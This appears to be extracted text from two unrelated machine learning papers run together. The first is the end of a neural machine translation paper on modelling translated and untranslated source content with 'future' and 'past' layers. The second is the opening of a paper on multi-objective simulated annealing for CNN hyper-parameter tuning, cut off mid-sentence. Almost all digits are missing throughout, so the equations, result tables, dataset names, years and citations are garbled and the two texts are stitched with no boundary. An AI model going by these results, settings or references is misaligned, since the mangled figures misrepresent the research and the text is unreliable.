t− ). ( ) in this way, both the attention model and the decoder state are aware of what has, and what has not yet been translated. . learning we introduce additional loss functions to estimate the semantic subtraction and addition, which guide the training of the future layer and past layer, respectively. loss function for subtraction. as described above, the future layer models the future seman- tics in a declining way: ∆ft = s f t− − sft ≈ ct. since source and target sides contain equivalent se- mantic information in machine translation (tu et al., a): ct ≈ e(yt), we directly measure the con- sistence between ∆ft and e(yt), which guides the subtraction to learn the right thing: loss(∆ft , e(yt)) = − log exp ( l(∆ft ,e(yt)) ) ∑ y exp ( l(∆ft ,e(y)) ); l(u, v) = u>wv + b. in other words, we explicitly guide the future layer by this subtractive loss, expecting ∆ft to be discriminative of the current word yt. loss function for addition. likewise, we intro- duce another loss function to measure the informa- tion incrementation of the past layer. notice that ∆pt = s p t − spt− ≈ ct, is defined similarly to ∆ft except a minus sign. in this way, we can reasonably assume the future and past layers are indeed do- ing subtraction and addition, respectively. training objective. we train the proposed model θ̂ on a set of training examples {[xn, yn]}nn= , and the training objective is θ̂ = arg min θ n∑ n= |y|∑ t= { − log p(yt|y<t, x; θ)︸ ︷︷ ︸ neg. log-likelihood + loss(∆ft , e(yt)|θ)︸ ︷︷ ︸ future loss + loss(∆pt , e(yt)|θ)︸ ︷︷ ︸ past loss } . experiments dataset. we conduct experiments on chinese- english (zh-en), german-english (de-en), and english-german (en-de) translation tasks. for zh-en, the training set consists of . m sen- tence pairs, which are extracted from the ldc cor- pora . the nist (mt ) dataset is our devel- opment set; the nist (mt ), (mt ), (mt ), (mt ) datasets are test sets. we also evaluate the alignment performance on the standard benchmark of liu and sun ( ), which contains manually aligned sentence pairs. we measure the alignment quality with the alignment er- ror rate (och and ney, ). for de-en and en-de, we conduct experiments on the wmt (bojar et al., ) corpus. the dataset consists of . m sentence pairs. we use newstest as our development set, and newstest as our testset. we follow sen- nrich et al. ( a) to segment both german and english words into subwords using byte-pair encod- ing (sennrich et al., , bpe). we measure the translation quality with bleu scores (papineni et al., ). we use the multi-bleu script for zh-en , and the multi-bleu-detok script for de-en and en-de . the corpora includes ldc e , ldc e , ldc e , hansards portion of ldc t , ldc t and ldc t https://github.com/moses-smt/ mosesdecoder/blob/master/scripts/generic/ multi-bleu.perl https://github.com/edinburghnlp/ nematus/blob/master/data/ multi-bleu-detok.perl training details. we use the nematus (sen- nrich et al., b), implementing a baseline trans- lation system, rnnsearch. for zh-en, we limit the vocabulary size to k. for de-en and en-de, the number of joint bpe operations is , . we use the total bpe vocabulary for each side. we tie the weights of the target-side embeddings and the output weight matrix (press and wolf, ) for de-en. all out-of-vocabulary words are mapped to a special token unk. we train each model with sentences lengths of up to words in the training data. the dimension of word embeddings is , and all hidden sizes are . in training, we set the batch size to for zh- en, and for de-en and en-de. we set the beam size to in testing. we shuffle the training corpus after each epoch. we use adam (kingma and ba, ) with an- nealing (denkowski and neubig, ) as our opti- mization algorithm. we set the initial learning rate as . , which halves when the validation cross- entropy does not decrease. for the proposed model, we use the same set- ting as the baseline model. the future and past layer sizes are . we employ a two-pass strategy for training the proposed model, which has proven useful to ease training difficulty when the model is relatively complicated (shen et al., ; wang et al., ; wang et al., ). model parameters shared with the baseline are initialized by the base- line model. . results on chinese-english we first evaluate the proposed model on the chinese-english translation and alignment tasks. . . translation quality table shows the translation performances on chinese-english. clearly the proposed approach significantly improves the translation quality in all cases, although there are still considerable differ- ences among different variants. future layer. (rows - ). all the activation functions for the future layer obtain bleu score improvements: gru + . , gru-o + . , and gru-i + . . specifically, gru-o is better than https://github.com/edinburghnlp/nematus # model dev mt mt mt mt avg. ∆ rnnsearch . . . . . . - + frnn (gru) . , . . . . + . + frnn (gru-o) . . . . . . + . + frnn (gru-i) . . . . . . + . + frnn (gru-i) + loss . . . . . . + . + prnn . . . . . . + . + prnn + loss . . . . . . + . + frnn (gru-i) + prnn . . . . . . + . + frnn (gru-i) + prnn + loss . . . . . . + . rnnsearch- dec . . . . . . - . rnnsearch- dec . . . . . . + . coverage (tu et al., ) . . . . . . + . table : case-insensitive bleu on chinese-english translation. “loss” means applying loss functions for future layer (frnn) and past layer (prnn). a regular gru for its minus operation, and gru- i is the best, which shows that our elaborately de- signed architecture is more proper for modeling the decreasing phenomenon of the future semantics. adding subtractive loss gives an extra . bleu score improvement, which indicates that adding g is beneficial guided objective for frnn to learn the minus operation. past layer. (rows - ). we observe the same trend on introducing the past layer: using it alone achieves a significant improvement (+ . ), and with the additional objective, it further improves the translation performance (+ . ). stacking the future and the past together. (rows - ). the model’s final architecture outper- forms our intermediate models ( - ) by combin- ing frnn and prnn. by further separating the functionaries of past content modeling and language modeling into different neural components, the final model is more flexible, obtaining a . bleu im- provement over the best intermediate model (row ) and an improvement of . bleu points over the rnnsearch baseline. comparison with other work. (rows - ). we also conduct experiments with multi-layer de- coders (wu et al., ) to see whether the nmt system can automatically model the translated and untranslated contents with additional decoder lay- ers (rows - ). however, we find that the per- formance is not improved using a two-layer decoder (row ), until a deeper version (three-layer decoder, row ) is used. this indicates that enhancing per- formance by simply adding more rnn layers into the decoder without any explicit instruction is non- trivial, which is consistent with the observation of britz et al. ( ). our model also outperforms the word-level cov- erage (tu et al., ), which considers the cover- age information of the source words independently. our proposed model can be regarded as a high-level coverage model, which captures higher level cover- age information, and gives more specific signals for the decision of attention and target prediction. our model is more deeply involved in generating target words, by being fed not only to the attention model as in tu et al. ( ), but also to the decoder state. . . subjective evaluation following tu et al. ( ), we conduct subjective evaluations to validate the benefit of modeling the past and the future (table ). four human eval- uators are asked to evaluate the translations of source sentences, which are randomly sampled from the testsets without knowing from which system the translation is selected. for the base system, . % of the source words are over-translated and . % are under-translated. our proposed model alleviates these problems by explicitly modeling the dynamic system architecture de-en en-de dev test dev test rikters et al. ( ) cgru + bpe + dropout . . . . + name entity forcing + synthetic data . . . . escolano et al. ( ) char char + rescoring with inverse model . - . - + synthetic data - . - . sennrich et al. ( a) cgru + bpe + synthetic data . . . . this work base . . . . coverage . . . . ours . . . . table : results of de-en and en-de “synthetic data” denotes additional m monolingual sentences, which is not used in our work. model over-trans under-trans ratio ∆ ratio ∆ base . % – . % – coverage . % - . % . % - . % ours . % - . % . % - . % table : subjective evaluation on over- and under- translation for chinese-english. “ratio” denotes the percentage of source words which are over- or under-translated, “∆” indicates relative improve- ment. “base” denotes rnnsearch and “ours” denotes “+ frnn (gru-i) + prnn + loss”. source contents by the past and the future lay- ers, reducing . % and . % of over-translation and under-translation errors, respectively. the pro- posed model is especially effective for alleviating the under-translation problem, which is a more se- rious translation problem for nmt systems, and is mainly caused by lacking necessary coverage infor- mation (tu et al., ). . . alignment quality table lists the alignment performances of our proposed model. we find that the coverage model does improve attention model. but our model can produce much better alignments compared to the word level coverage (tu et al., ). our model distinguishes the past and future directly, which is a higher level coverage mechanism than the word coverage model. model aer ∆ base . – coverage . - . ours . - . table : evaluation of the alignment quality. the lower the score, the better the alignment quality. . results on german-english we also evaluate our model on the wmt bench- marks for both de-en and en-de. as shown in table , our baseline gives comparable bleu scores to the state-of-the-art nmt systems of wmt . our pro- posed model improves the strong baseline on both de-en and en-de. this shows that our proposed model works well across different language pairs. rikters et al. ( ) and sennrich et al. ( a) ob- tain higher bleu scores than our model, because they use additional large scale synthetic data (about m) for training. it maybe unfair to compare our model to theirs directly. . analysis we conduct analyses on zh-en, to better understand our model from different perspectives. parameters and speeds. as shown in table , the baseline model (base) has m parameters. a single future or past layer introduces m to m parameters, and the corresponding objective introduces m parameters. in this work, the most complex model introduces m parameters, which model #para. speed train test base m . . + frnn (gru) m . . + frnn (gru-o) m . . + frnn (gru-i) m . . + loss m . . + prnn m . . + loss m . . + frnn + prnn m . . + loss m . . rnnsearch- dec m . . rnnsearch- dec m . . coverage m . . table : statistics of parameters, training and testing speeds (sentences per second). leads to a relatively slower training speed. how- ever, our proposed model does not significant slow down the decoding speed. the most time consum- ing part is the calculation of the subtraction and ad- dition losses. as we show in the next paragraph, our system works well by only using the losses in training, which further improve the decoding speed of our model. effectiveness of subtraction and addition loss. adding subtraction and addition loss functions helps twofold: ( ) guiding the training of the proposed subtraction and addition operation; ( ) enabling bet- ter reranking of generated candidates in testing. ta- ble lists the improvements from the two perspec- tives. when applied only in training, the two loss functions lead to an improvement of . bleu points by better modeling subtraction and addition operations. on top of that, reranking with future and past loss scores in testing further improves the performance by + . bleu points. initialization of the future layer. the base- line model does not obtain abundant accuracy im- provement by feeding the source summarization into the decoder (table ). we also experiment to not feed the source summarization into the decoder of the proposed model, which leads to a significant bleu score drop on zh-en. this shows that our proposed model better use the source summarization model loss used in bleu ∆ train test base – – . – ours × × . + . x × . + . x x . + . table : contributions of loss functions from param- eter training (“train”) and reranking of candidates in testing (“test”). initialize frnn with . . . bleu source summarization . all-zero vector . table : influence of initialization of frnn layer (gru-i) with explicitly modeling the future compared to the conventional encoder-decoder baseline. case study. we also compare the translation cases for the baseline, word level coverage and our proposed models. as shown in table , our base- line system suffers from the over-translation prob- lems (case ), which is consistent with the results of human evaluation (section ). the base system also incorrectly translates “the royal family” into “the people of hong kong”, which is totally irrele- vant here. we attribute the former case to the lack of untranslated future modeling, and the latter one to the overloaded use of the decoder state where the language modeling of the decoder leads to the flu- ent but wrong predictions. in contrast, the proposed approach almost addresses the errors in these cases. conclusion modeling source contents well is crucial for encoder-decoder based nmt systems. however, current nmt models suffer from distinguishing translated and untranslated translation contents, due to the lack of explicitly modeling past and future translations. in this paper, we separate past and future functionalities from decoder states, which can maintain a dynamic yet holistic view of the source content at each decoding step. experimen- tal results show that the proposed approach signifi- source 布什还表示 , 应巴基斯坦和印度政府的邀请 , 他将于 月份对巴基斯坦和 印度进行访问。 reference bush also said that at the invitation of the pakistani and indian governments , he would visit pakistan and india in march . base bush also said that he would visit pakistan and india in march . coverage bush also said that at the invitation of pakistan and india , he will visit pakistan and india in march . ours bush also said that at the invitation of the pakistani and indian governments , he will visit pakistan and india in march . source 所以有不少人认为 说 , 如果是这样的话 , 对皇室、对日本的社会也是 会有很大的影响的。 reference therefore , many people say that it will have a great impact on the royal family and japanese society . base therefore , many people are of the view that if this is the case , it will also have a great impact on the people of hong kong and the japanese society . coverage therefore , many people think that if this is the case , there will be great impact on the royal and japanese society . ours therefore , many people think that if this is the case , it will have a great impact on the royal and japanese society . table : comparison on translation examples. we italicize some translation errors and highlight the correct ones in bold. cantly improves translation performances across dif- ferent language pairs. with better modeling of past and future translations, our approach performs much better than the standard attention-based nmt, re- ducing the errors of under and over translations. acknowledgement we would like to thank the anonymous reviewers as well as the action editor, philipp koehn, for in- sightful comments and suggestions. shujian huang is the corresponding author. this work is sup- ported by the national science foundation of china (no. , ), the jiangsu provin- cial research foundation for basic research (no. bk ). references jimmy ba, geoffrey hinton, volodymyr mnih, joel z leibo, and catalin ionescu. . using fast weights to attend to the recent past. in nips . dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . neural machine translation by jointly learning to align and translate. in iclr . dzmitry bahdanau, philemon brakel, kelvin xu, anirudh goyal, ryan lowe, joelle pineau, aaron courville, and yoshua bengio. . an actor-critic algorithm for sequence prediction. in iclr . ondřej bojar, christian buck, rajen chatterjee, chris- tian federmann, yvette graham, barry haddow, matthias huck, antonio jimeno yepes, philipp koehn, and julia kreutzer. . proceedings of the second conference on machine translation. in proceedings of the second conference on machine translation. asso- ciation for computational linguistics. denny britz, anna goldie, minh-thang luong, and quoc le. . massive exploration of neural ma- chine translation architectures. in emnlp . kyunghyun cho, bart van merrienboer, caglar gulcehre, dzmitry bahdanau, fethi bougares, holger schwenk, and yoshua bengio. . learning phrase represen- tations using rnn encoder–decoder for statistical ma- chine translation. in emnlp . michael denkowski and graham neubig. . stronger baselines for trustable results in neural ma- chine translation. in proceedings of the first work- shop on neural machine translation. carlos escolano, marta r. costa-jussà, and josé a. r. fonollosa. . the talp-upc neural machine translation system for german/finnish-english using the inverse direction model in rescoring. in proceed- ings of the second conference on machine transla- tion, volume : shared task papers. alex graves, greg wayne, and ivo danihelka. . neural turing machines. arxiv: . . caglar gulcehre, sarath chandar, kyunghyun cho, and yoshua bengio. . dynamic neural tur- ing machine with soft and hard addressing schemes. arxiv: . . sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation. nal kalchbrenner and phil blunsom. . recurrent continuous translation models. in emnlp . diederik p. kingma and jimmy ba. . adam: a method for stochastic optimization. iclr . jiwei li, will monroe, and daniel jurafsky. . learning to decode for future success. arxiv: . . yang liu and maosong sun. . contrastive unsu- pervised word alignment with non-local features. in aaai . thang luong, hieu pham, and christopher d. manning. . effective approaches to attention-based neural machine translation. in emnlp . fandong meng, zhengdong lu, hang li, and qun liu. . interactive attention for neural machine transla- tion. in coling . haitao mi, baskaran sankaran, zhiguo wang, and abe ittycheriah. . coverage embedding models for neural machine translation. emnlp . tomas mikolov, greg corrado, kai chen, and jeffrey dean. . efficient estimation of word represen- tations in vector space. iclr . alexander miller, adam fisch, jesse dodge, amir- hossein karimi, antoine bordes, and jason weston. . key-value memory networks for directly read- ing documents. in emnlp . franz josef och and hermann ney. . a systematic comparison of various statistical alignment models. computational linguistics. kishore papineni, salim roukos, todd ward, and wei- jing zhu. . bleu: a method for automatic eval- uation of machine translation. in acl . ofir press and lior wolf. . using the output embed- ding to improve language models. in eacl . scott reed and nando de freitas. . neural programmer-interpreters. computer science. matı̄ss rikters, chantal amrhein, maksym del, and mark fishel. . c- ma: tartu-riga-zurich trans- lation systems for wmt . tim rocktäschel, johannes welbl, and sebastian riedel. . frustratingly short attention spans in neural lan- guage modeling. in iclr . mike schuster and kuldip k. paliwal. . bidirec- tional recurrent neural networks. ieee transactions on signal processing. rico sennrich, barry haddow, and alexandra birch. . neural machine translation of rare words with subword units. computer science. rico sennrich, alexandra birch, anna currey, ulrich germann, barry haddow, kenneth heafield, an- tonio valerio miceli barone, and philip williams. a. the university of edinburgh’s neural mt sys- tems for wmt . in proceedings of the second con- ference on machine translation, volume : shared task papers in acl. rico sennrich, orhan firat, kyunghyun cho, alexan- dra birch, barry haddow, julian hitschler, marcin junczys-dowmunt, samuel läubli, antonio valerio miceli barone, jozef mokry, and maria nadejde. b. nematus: a toolkit for neural machine trans- lation. in eacl . shiqi shen, yong cheng, zhongjun he, wei he, hua wu, maosong sun, and yang liu. . minimum risk training for neural machine translation. in acl . sainbayar sukhbaatar, arthur szlam, jason weston, and rob fergus. . end-to-end memory networks. in nips . ilya sutskever, oriol vinyals, and quoc v. le. . sequence to sequence learning with neural networks. in nips . zhaopeng tu, zhengdong lu, yang liu, xiaohua liu, and hang li. . modeling coverage for neural machine translation. in acl . zhaopeng tu, yang liu, zhengdong lu, xiaohua liu, and hang li. a. context gates for neural ma- chine translation. transactions of the association for computational linguistics. zhaopeng tu, yang liu, lifeng shang, xiaohua liu, and hang li. b. neural machine translation with re- construction. in aaai . mingxuan wang, zhengdong lu, hang li, and qun liu. . memory-enhanced decoder for neural machine translation. in emnlp . xing wang, zhengdong lu, zhaopeng tu, hang li, deyi xiong, and min zhang. . neural machine trans- lation advised by statistical machine translation. in aaai . longyue wang, zhaopeng tu, shuming shi, tong zhang, yvette graham, and qun liu. . trans- lating pro-drop languages with reconstruction models. in aaai . rongxiang weng, shujian huang, zaixiang zheng, xin- yu dai, and jiajun chen. . neural machine trans- lation with word predictions. in emnlp . yonghui wu, mike schuster, zhifeng chen, quoc v. le, mohammad norouzi, wolfgang macherey, maxim krikun, yuan cao, qin gao, klaus macherey, et al. . google’s neural machine translation system: bridging the gap between human and machine trans- lation. arxiv: . . multi-objective simulated annealing for hyper-parameter optimization in convolutional neural networks multi-objective simulated annealing for hyper-parameter optimization in convolutional neural networks ayla gülcü and zeki kuş computer science, fatih sultan mehmet university, istanbul, turkey abstract in this study, we model a cnn hyper-parameter optimization problem as a bi-criteria optimization problem, where the first objective being the classification accuracy and the second objective being the computational complexity which is measured in terms of the number of floating point operations. for this bi-criteria optimization problem, we develop a multi-objective simulated annealing (mosa) algorithm for obtaining high-quality solutions in terms of both objectives. cifar- is selected as the benchmark dataset, and the mosa trade-off fronts obtained for this dataset are compared to the fronts generated by a single-objective simulated annealing (sa) algorithm with respect to several front evaluation metrics such as generational distance, spacing and spread. the comparison results suggest that the mosa algorithm is able to search the objective space more effectively than the sa method. for each of these methods, some front solutions are selected for longer training in order to see their actual performance on the original test set. again, the results state that the mosa performs better than the sa under multi-objective setting. the performance of the mosa configurations are also compared to other search generated and human designed state-of-the-art architectures. it is shown that the network configurations generated by the mosa are not dominated by those architectures, and the proposed method can be of great use when the computational complexity is as important as the test accuracy. subjects artificial intelligence, computer vision keywords multi-objective, simulated annealing, convolutional neural networks, hyper-parameter optimization introduction convolutional neural networks (cnns) differ from multi-layer perceptron models with the use of convolution operators instead of matrix multiplications in at least one of its layers (lecun et al., ; lecun et al., ; goodfellow, bengio & courville, ). excellent results obtained for object classification problems in ilsvrc (imagenet large scale vision recognition competition) accelerated the use of these networks in other vision related problems like face and activity recognition (russakovsky et al., ). with the availability of increasing computational resources, winning architectures of the competition, aka state-of-the-art models, became deeper and deeper resulting in very high classification accuracy rates. in , ilsvrc winner model, vggnet (simonyan & zisserman, ), had layers, but the following years’ state-of-the-art models, for example, resnet (he et al., ) and densenet (huang et al., ) had over layers. how to cite this article gülcü a, kuş z. . multi-objective simulated annealing for hyper-parameter optimization in convolutional neural networks. peerj comput. sci. :e doi . /peerj-cs. submitted june accepted november published january corresponding author ayla gülcü, agulcu@fsm.edu.tr academic editor andrea schaerf additional information and declarations can be found on page doi . /peerj-cs. copyright gülcü and kuş distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:agulcu@�fsm.�edu.�tr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ finding a cnn architecture that generates high quality results for a given problem is a challenging process which requires a systematic approach rather than by trial and error. moreover, trying all possible parameter combinations is infeasible due to the size of the parameter space. the problem of automatically designing cnn architectures and selecting the best set of hyper-parameters for the network has drawn attention of many researchers over many years. it is shown in many studies that using algorithmic approaches rather than manual tuning process results in simpler networks with improved classification performance (bergstra & bengio, ; real et al., ; ma et al., ). this automated neural architecture search (nas) and hyper-parameter optimization is not only limited to cnns, but also applicable for both feed-forward and recurrent neural networks (rnns). for example, the architectures and the hyper-parameters of long short-term memory networks which are the most widely-used variants of rnns can be optimized with the proposed approaches. hyper-parameter optimization (hpo) is the most basic task in automated machine learning (automl) which reduces the human effort by automatizing the labor intensive hyper-parameter tuning process. with hpo, a wider solution space can be searched, which in turn may yield in better performing configurations for the problem at hand (for a detailed view on hpo, please refer to feurer & hutter, ). on the other hand, nas is a specialized hyper-parameter optimization problem which involves discrete hyper-parameters as in hpo, but with an additional structure that can be captured with a directed acyclic graph (dag) (li & talwalkar, ). in nas methods, the search space for designing an entire architecture contains too many nodes and edges; therefore it is usually defined over smaller building blocks called cells which drastically reduce the search space. a new architecture is then built by stacking these cells in a predefined manner. the number of the cells and the types of those cells along with the types of connections allowed among those cells are among important design decisions in nas studies (elsken, metzen & hutter, ). random search (rs) (bergstra & bengio, ), bayesian optimization (bo) approaches (hoffman & shahriari, ) and population-based optimization algorithms such as genetic algorithms (gas) (holland, ), evolutionary algorithms (eas) (back, ) and particle swarm optimization (pso) (eberhart & kennedy, ) have been successfully used to select the best cnn hyper-parameters. especially, eas are among the most widely used techniques for hpo. in (real et al., ; suganuma, shirakawa & nagao, ; elsken, metzen & hutter, ) eas have been used for optimizing the network architecture and gradient-based methods have been used for optimizing the network weights. single-stage algorithms like simulated annealing (sa) and its variants have also proven to be effective for cnn hpo problems (gülcü & kuş, ). nas has become a very important research topic especially after it has obtained competitive performance on the cifar- and penn treebank benchmarks with a search strategy based on reinforcement learning (zoph & le, ). however, the computational cost of this approach led the researchers to seek other methods with less computational requirement but with higher classification performance. relaxation-based methods (liu, simonyan & yang, ) try to improve the computational efficiency of gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ nas approaches, but these approaches still require huge computational resources. eas provide a good alternative for nas, but they still suffer from the large computational requirement (liu et al., ). on the other hand, it is shown that ea-based nas methods that use limited search budgets result in poor classification performance (xie & yuille, ; sun et al., a). therefore, recent hpo and nas approaches not only consider the error rate, but also the complexity brought by the proposed configuration or architecture. a single-objective optimization problem involves a single objective function, and usually results in a single solution. however, in many real-life problems, there are multiple objectives to be considered, and these objectives usually conflict with each other. optimizing a solution with respect to one objective often results in unacceptable results with respect to the other objectives. for example, achieving a network with a low error rate usually comes with a huge cost of computational complexity. thus, a perfect multi- objective solution that simultaneously optimizes each objective function is almost impossible. a minimization multi-objective optimization problem with k objectives is defined as follows (konak, coit & smith, ): given an n-dimensional decision variable vector x ¼ x ;::;xnf g in the solution space x , find a vector x� that minimizes a given set of k objective functions z x�ð Þ¼ z x�ð Þ;::;zk x�ð Þf g. the solution space x is generally restricted by a series of constraints and bounds on the decision variables. there are two general solution approaches to multi-objective optimization (moo). one is to combine all of the objective functions into a single composite function using methods like weighted sum method, but in practice it is very difficult to select the proper weights that will reflect the decision maker’s preferences. the second approach is to provide the decision maker a set of solutions that are non-dominated with respect to each other from which she/he can choose one. a reasonable solution to a multi-objective problem is to find a set of solutions, each of which satisfies the objectives at an acceptable level without being dominated by any other solution. a feasible solution x is said to dominate another feasible solution y; x � y, if and only if, zi xð Þzi yð Þ for i ¼ ;::;k and zj xð Þ < zj yð Þ for at least one objective function j. a solution is said to be pareto optimal if it is not dominated by any other solution in the solution space. improving a pareto optimal solution with respect to one objective is impossible without worsening at least one of the other objectives. the set of all feasible non-dominated solutions in the solution space is referred to as the pareto-optimal set, and for a given pareto-optimal set, the corresponding objective function values in the objective space are called the pareto- front. in multi-objective optimization, there are two tasks to be completed, where the first task being the optimization task for finding the pareto-optimal set, and the second task being a decision making task for choosing a single most preferred solution from that set which involves a human interaction. generating the pareto-optimal set is often infeasible, and the methods like evolutionary algorithms (eas) usually do not guarantee to identify the optimal front, but try to provide a good approximation; that is, a set of solutions whose objective vectors are not too far away from the optimal objective vectors. since the pareto-optimal set is unknown, comparing the approximations generated by gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ different methods is a difficult task requiring appropriate quality measures to be used. there are several measures in the literature each of which reflects a different aspect of the quality such as the closeness to the optimal front and the diversity of the solutions in the front (please refer to zitzler et al., for a detailed review on moo performance assessment). multi-objective ea-based approaches are among the most widely-used methods for cnn moo problems. in these studies, high classification performance is considered as the first objective, and the low computational requirement is considered as the second objective. it is aimed to generate networks that are satisfactory with respect to both of these objectives. (kim et al., ) try to optimize the deep neural networks in terms of two competing objectives, speed and accuracy using gas. in their study, lenet (lecun et al., ) is chosen as the initial architecture, and the performance of the initial solution is improved considering two objectives. test results based on the mnist (lecun et al., ), cifar- (krizhevsky & hinton, ) and drowsiness recognition (weng, lai & lai, ) show that the proposed approach yields in models with better accuracy and speed than the initial model. in elsken, metzen & hutter ( ), lamarckian evolution and multi-objective ea is used to generate computationally efficient cnns with high classification accuracy values. based on the results on cifar- dataset, the proposed approach achieves competitive results with other multi-objective approaches. lu et al. ( a) present another multi-objective ea which they call nsganet that try to optimize both error rate and the number of floating point operations (flops). according to the test results obtained using cifar- , cifar- and human chest x-rays data sets, the proposed approach increase the search efficiency. same objectives are also adopted in the study of wang et al. ( ) in which pso is used to fine tune the hyper-parameters. in the study, best models are compared to densenet- in terms of both objectives. the results based on cifar- dataset state that the models generated by the proposed approach dominate the base model. in this study, we present a single-stage hpo method to optimize the hyper-parameters of cnns for object recognition problems considering two competing objectives, classification accuracy and the computational complexity which is best measured in terms of flops. for this bi-criteria optimization problem, we use a multi-objective simulated annealing (mosa) algorithm with the aim of generating high quality fronts. cifar- dataset is selected as the benchmark, and the final fronts generated by the proposed algorithm is compared to the fronts generated by a single-objective variant of the same algorithm with respect to several front metrics such as generational distance, spacing and spread. according to the results obtained using these front evaluation metrics, it can be concluded that the mosa algorithm is able to search the objective space more effectively than the sa method. after performing longer training on the selected configurations, the results again reveal that the mosa performs better than the sa under multi-objective setting. the mosa configurations are also compared to human engineered and search generated configurations. when both test accuracy and the complexity are taken into account, it is shown that the network configurations generated by the mosa are gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ not dominated by those configurations, and the proposed method can be of great use when the computational complexity is as important as the test accuracy. materials and methods in “cnns—an overview”, we remind key concepts of cnns and multi-objective aspects of cnns. in “sa algorithm”, we first describe a single-objective sa algorithm, and then in “mosa algorithm”, we give some details about the mosa algorithm that discriminate it from the sa such as the acceptance criterion and the archive maintenance mechanism. in “performance evaluation criteria” we elaborate the performance evaluation metrics used in this study to compare different pareto fronts in a quantitative manner. cnns—an overview neural networks (nns) receive an input and transform it through a series of hidden layers each of which is made up of a set of neurons that receives some inputs, performs a dot product followed with a non-linearity. in any layer, each neuron is fully connected to all neurons in the previous layer, that is why regular nns don’t scale well to inputs in the form of images. similarly, cnns are made up of neurons that have learnable weights and biases, and the whole network still expresses a single differentiable score function. in general, cnns assume that the inputs are images, and they constrain the architecture in a more sensible way. there are three types of layers in cnns: convolution layer, pooling layer and fully connected layer. a convolution layer is a fundamental component of a cnn architecture that performs feature extraction through a combination of linear and nonlinear operations, that is, convolution operation and activation function. convolution is specialized type of linear operation used for feature extraction with the help of a small array of numbers called filter or kernel navigating over the input tensor. at each location of the input tensor, an element-wise product between the elements of the filter and the input is applied. these products are then summed to obtain the output value in the corresponding position of the output tensor which is called a feature map. this operation is repeated using multiple kernels resulting in multiple number of feature maps at a single layer. figure illustrates a cnn with two convolution layers each of which contains different number of filters with differing size. in the figure, images of size × × are fed into the cnn where the first two dimensions denote the width and height of the image, and the third dimension denotes the number of channels which is for a color image. as can be seen in fig. which illustrates the convolution process, the number of channels (depth) of the filters always equals to the number of channels of the input image, but the size and the number of those filters are among the hyper-parameters whose values should be selected carefully. the convolution process can be speed up by using dimension reduction adjusting the stride value. if the stride value takes a value other than , then the filter skips the input by this amount. if input size reduction is not desired, padding is used. in the pooling layer, size reduction is done in the same way as in the convolution layer with one difference is that the number of channels remains unchanged. there are two main types of gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ pooling methods: max and average pooling. pooling type, the size and the stride of the filter are among the hyper-parameters in a given network. in the example cnn in fig. , the first convolution layer includes filters each with a size of × × , and after the first convolution operation, linear structure is transformed into a non-linear structure using relu activation function. after the pooling layer, input weight and height is reduced to × , but the depth is increased to . after the second convolution and pooling operations, input width and height is reduced even more. strive method is proposed as an alternative to the pooling method (springenberg et al., ). a strive layer is a kind of convolution layer with × or × filter sizes with a stride of . filters in this layer do not have weights to learn, because, only size reduction is applied. after the convolution and pooling operations, a flattening operation is applied to transform all the feature maps in the final layer into a one-dimensional vector which is then fed to the fully connected figure an example cnn architecture. full-size doi: . /peerj-cs. /fig- figure convolution process. full-size doi: . /peerj-cs. /fig- gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ layer where classification results are obtained. there might be multiple fully connected layers in a cnn; however, the output size of the last fully connected layer should match the number of classes in the problem. for a given input, a classification score is computed for each class and the input is assigned to the class with the highest score. based on the prediction accuracy, an error is computed which is then used to update the weights in the network. this process is repeated until a desired error rate is achieved. for a detailed review on the topic please refer to (goodfellow, bengio & courville, ). hyper-parameters like the total number of layers, the number and size of the filters at each layer along with filter related parameters like stride and padding define a cnn configuration or an architecture. on the other hand, total number of weights in all of the layers of a cnn defines the size or the number of parameters of that network. the size of a cnn is calculated differently for convolution and fully connected layers. the number of parameters in a convolution layer equals to d �m�nð Þþ ð Þ�k , where d is the number of input feature maps, and m and n are the filter width and height, respectively ( is added because of the bias term for each filter), and k is the number of output feature maps. the number of parameters in a fully connected equals to cþ ð Þ�p, where c is the number of input nodes and p is the number of output nodes. sa algorithm simulated annealing (sa) uses an adaptation of the metropolis algorithm to accept non-improving moves based on a probability (kirkpatrick, gelatt & vecchi, ). in a single-objective sa, a new solution, x′, is selected within the neighborhood of current solution x, where the neighborhood of x is defined as all the solutions that can be reached by a single move from x. the moves that can be performed in a sa are defined based on the representation used to encode a feasible solution. solution representation, on the other hand, is highly dependent on the problem domain. if the objective function value of x′ is smaller than x (for a minimization problem), then x′ is accepted. if x′ is worse than x, then it is accepted with a probability, pacc,which is calculated based on the worsening amount and the current temperature of the system as, pacc ¼ min ; exp �df=tcurð Þf g where df is the worsening amount in the objective function and tcur is the current temperature. if the temperature is high, then the probability of accepting a worsening move would be higher than the probability with a lower temperature. in general, the system is initiated with a high temperature to allow exploration during initial steps. as shown in the sa pseudo-code below, after a certain number of solutions are visited at the current temperature level which is defined by the parameter nbr inner iter, the temperature is lowered gradually according to a predefined annealing scheme. geometric cooling that uses a decay factor smaller than is the most widely used cooling scheme in sa. at each outer iteration, tcur is reduced to ensure the convergence of the algorithm, because the probability of accepting worsening moves drops as tcur reduces. the total number of solutions visited during a run of a sa is defined as nbr out iter �nbr inner iter. however, the number of outer iterations is not always fixed before the start of the algorithm. a minimum temperature level, or a minimum objective function value can be defined as the stopping criterion. initial gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ temperature, tinit, cooling rate (if geometric cooling is employed) and the final temperature, tfinal are important parameters that should be selected carefully. in this study, the sa algorithm considers only one objective which is the error rate, and it accepts a new 